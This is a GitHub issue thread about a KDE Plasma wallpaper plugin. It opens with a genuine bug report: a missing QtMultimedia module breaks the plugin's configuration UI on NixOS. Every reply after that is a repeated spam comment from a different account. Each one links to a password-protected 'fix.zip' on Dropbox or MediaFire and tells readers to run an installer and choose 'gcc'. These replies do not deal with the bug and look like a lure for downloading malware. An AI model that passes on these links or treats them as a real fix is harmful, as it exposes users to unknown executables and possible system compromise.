### ISSUE TITLE
Still have UI issues

### ISSUE THREAD

**Issue by bglebrun** [Blacksuan19/plasma-wallpaper-wallhaven-reborn#1]
Using
` journalctl -f | grep --line-buffered kde `

reports this error

`plasmashell[2491]: file:///nix/store/<nixos-hash>-plasma-desktop-6.0.5/share/plasma/shells/org.kde.plasma.desktop/contents/configuration/ConfigurationContainmentAppearance.qml:130:9: QML StackView: replace: file:///home/<usr>/.local/share/plasma/wallpapers/com.plasma.wallpaper.wallhaven/contents/ui/config.qml:24 module "QtMultimedia" is not installed`

Until line 24 for the QtMultimedia import was removed I was also having hidden UI issues. Running NixOS so I leave the option open that this could be isolated to just my system.

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
